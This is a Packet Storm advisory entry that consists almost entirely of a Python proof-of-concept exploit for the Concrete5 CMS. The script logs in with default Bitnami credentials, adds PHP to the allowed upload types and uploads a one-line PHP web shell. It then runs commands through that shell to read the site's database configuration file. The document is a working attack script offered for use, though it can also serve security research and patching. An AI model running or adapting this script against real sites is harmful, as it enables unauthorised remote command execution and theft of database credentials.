Concrete5 Proof Of Concept Shell Upload

2017-05-28T00:00:00
ID PACKETSTORM:142732
Type packetstorm
Reporter Cody Sixteen
Modified 2017-05-28T00:00:00

Description

                                        
                                            `c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py  
#!/usr/bin/env python  
# shell-concrete5.py - module based on previous version  
# created 29.04.2017. Bug ('feature') is exploitable only  
# when you will have a valid credentials.  
import sys  
import re  
import requests  
  
target = raw_input("[+] Hostname> ")  
logMe = target + '/index.php/login'  
session = requests.session()  
  
initreq = session.get(logMe)  
initresp = initreq.text  
  
gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')  
found = re.search(gettoken, initresp)  
  
if found:  
token = found.group(1)  
print '[+] Found token: ' + str(token)  
  
  
# assuming token is valid, let's log in  
login_data = {  
'uName':'user',  
'uPassword':'bitnami',  
'ccm_token':token  
}  
loglink = target + '/index.php/login/authenticate/concrete'  
loginreq = session.post(loglink, data=login_data)  
  
#afterlogin = target + '/index.php/dashboard/system'  
afterlogin = target + '/index.php/dashboard/system/files/filetypes'  
nextreq1 = session.get(afterlogin)  
nextresp1 = nextreq1.text  
print '[+] Cool, we\'re logged-in!'  
#print afterlogin  
#print nextresp1  
print '[+] We are ready to go, extension-page is available.'  
print ''  
  
# construct POST with new.ext  
newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')  
foundToken = re.search(newToken, nextresp1)  
  
if foundToken:  
newOne = foundToken.group(1)  
print '[+] New token grabbed: ' + str(newOne)  
  
data_ext = {  
'ccm_token':newOne,  
'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'  
}  
datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'  
datareq = session.post(datalink, data=data_ext)  
dataresp = datareq.text  
nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')  
newexts = re.search(nowwecan, dataresp)  
  
if newexts:  
print '[+] Available now: '+ newexts.group(1)  
  
print '[+] Time to upload shell...'  
  
# next token to upload request  
nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'  
tokreq3 = session.get(nextTokenUrl)  
tokresp3 = tokreq3.text  
  
grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')  
foundit = re.search(grabNextTok, tokresp3)  
  
if foundit:  
tokentoup = foundit.group(1)  
print '[+] Next token (3rd): ' + str( tokentoup )  
  
# we are logged-in; preparing req to upload shell  
saymyname = 'meshell3.php'  
  
fp = open(saymyname,'w')  
fp.write('<?php system($_GET["xx"]);')  
fp.close()  
  
# tmpshfile ready, do req now  
up_files = { 'file':open(saymyname,'rb') }  
  
up_params = {  
'ccm_token':tokentoup,  
'filename':saymyname,  
'currentFolder':'0'  
}  
upreqlink = target + '/index.php/ccm/system/file/upload'  
upreqnow = session.post(upreqlink, files=up_files, data=up_params)  
upresp = upreqnow.text  
if saymyname in upresp:  
print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'  
  
searchme = target + '/index.php/dashboard/files/search'  
dosearch = session.get(searchme)  
meresp = dosearch.text  
  
searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')  
foundShLink = re.search(searchShLink, meresp)  
  
if foundShLink:  
foundId = foundShLink.group(3)  
shid = foundId.strip('\/')  
print '[+] Found link ID:' + str(shid)  
  
preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)  
prepreq = session.get(preparingProp)  
prepresp = prepreq.text  
whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'  
whereareu = re.compile(whereareutxt)  
foundme2 = re.search(whereareu, prepresp)  
  
if foundme2:  
print '[+] Shell is ready to use:'  
shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'  
print ' ' + shellshere  
  
print '[+] "Finish him!" ;7'  
finish = session.get(shellshere)  
fintxt = finish.text  
print '[+] Response:'  
print fintxt  
print '\n---------------'  
  
else:  
print '[-] I can not upload our shell. Verify!'  
  
`